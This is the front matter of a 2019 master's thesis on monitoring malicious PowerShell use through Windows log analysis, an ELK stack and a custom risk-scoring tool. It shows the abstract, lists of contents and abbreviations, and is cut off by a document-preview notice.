Monitoring malicious PowerShell usage through log analysis

Monitoring malicious PowerShell usage through log analysis

Jesper Magnusson

Computer Science and Engineering, master's level 2019

Lule? University of Technology Department of Computer Science, Electrical and Space Engineering

(This page is intentionally left almost blank)

Abstract Security has become a hot topic around the world but focuses more on the perimeter than inside networks which opens up vulnerabilities. Directed cyber-attacks towards the energy sector which leverages this fact has increased and can have disastrous effect, even on national level. To counter this, a solution to monitor the usage of the most powerful and popular built-in tool among attackers - PowerShell - was implemented. A test-bed was set up reflecting a corporate network with two separate active directory domains, one for office clients and one for critical infrastructure. It was shown that attackers only needed to overtake the office active directory domain in order for gain easy access to the critical active directory domain. To simulate attacks of this type, a collection of malicious scripts was gathered from which a number of possible scenarios for taking over the office active directory domain via PowerShell was created. Windows has several options for logging executions of PowerShell commands on machines. The one used and deemed most beneficiary was "Module logging" with the addition of a filtered result of process creation logs. To monitor the logs created on the office client from PowerShell executions, a system based on the "ELK stack" was set up. This system gathered, processed, stored and visualized logs along with the result of their analysis. The system analyzed logs with the aid of a custom software called "ESPSA" which based on different parameters and contexts assigned every execution with a risk value indicating the level of maliciousness. To be able to assign risk values, the maliciousness of every command had to be evaluated. This was done with the aid of a mathematical expression that gave values between 0 and 100 based on the probability of benign execution and the security risk of the actual command. The evaluation shows that all simulated attack scenarios were detected as malicious by reaching total risk values above the threshold of 100 in their exact implementation. It also shows that possible branching of these attacks could instead lead to a value below the threshold and become undetectable. Evaluation also shows that "Module logging" is unable to detect certain types of executions, primarily those of .NET Framework interactions, which affects the monitoring possibilities for malicious behavior severely.

i

List of Figures

1 Industroyer overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 2 Test-bed used for vulnerability evaluation . . . . . . . . . . . . . . . . . . 15 3 Test-bed with implemented solution . . . . . . . . . . . . . . . . . . . . . 24 4 Process flow between solution components . . . . . . . . . . . . . . . . . . 25 5 Process flow between ESPSA components . . . . . . . . . . . . . . . . . . 27 6 Example graph of Akima Cubic Spline Interpolation for time risk factoring

with working hours between 8 and 17 . . . . . . . . . . . . . . . . . . . . 31 7 3D plot of equation 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42

List of Tables

1 Malicious PowerShell scripts . . . . . . . . . . . . . . . . . . . . . . . . . . 16 2 enabled GPOs for PowerShell logging . . . . . . . . . . . . . . . . . . . . . 23 3 PowerShell command risk assignments . . . . . . . . . . . . . . . . . . . . 32 4 Outcome of simulation - Local files . . . . . . . . . . . . . . . . . . . . . . 37 5 Outcome of simulation - MSI packages . . . . . . . . . . . . . . . . . . . . 38 6 Outcome of simulation - Saved browser credentials . . . . . . . . . . . . . 39

List of Listings

1 PowerShell logon script . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 2 PowerShell logoff script . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 3 Added log structure by Logstash . . . . . . . . . . . . . . . . . . . . . . . 26

List of Equations

1 PowerShell execution risk evaluation . . . . . . . . . . . . . . . . . . . . . 30 2 PowerShell command risk assignment . . . . . . . . . . . . . . . . . . . . . 32

ii

Abbreviations

AD Active Directory. 5, 7, 8, 14?16, 18?22, 36, 37, 39, 40 AD DS Active Directory Domain Services. viii, 14?16, 20?22 AI Artificial Intelligence. 49 BHIPS Behavioural Host Intrusion Prevention System. 3 BIOS Basic Input/Ouput System. 7, 16 C# C Sharp. 24, 27 C&C command-and-control. 5?9, 11, 12, 20 CLI Command Line Interface. 13 CMD Command Prompt. iii, 45, 48, Glossary: Command Prompt CNN Convolutional Neural Network. 3 COM Component Object Model. 12 CPU Central Processing Unit. 8 DC Domain Controller. viii, 15, 16, 21, 40 DCOM Distributed COM. 12 DHCP Dynamic Host Configuration Protocol. 16 DLL Dynamic-Link Library. 6?8, 11, 12 DMS Distribution Management System. 9, 10 DNS Domain Name System. 17, 19 DoS Denial-of-Service. iii, 10, 12, Glossary: Denial-of-Service FIFO First In First Out. 28 FTP File Transfer Protocol. 21 GPO Group Policy Object. ii, viii, 4, 13, 15, 16, 20, 21, 23, 25, 43?45 HMI Human-Machine Interface. 9 HTML HyperText Markup Language. 7, 19

iii

 ................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download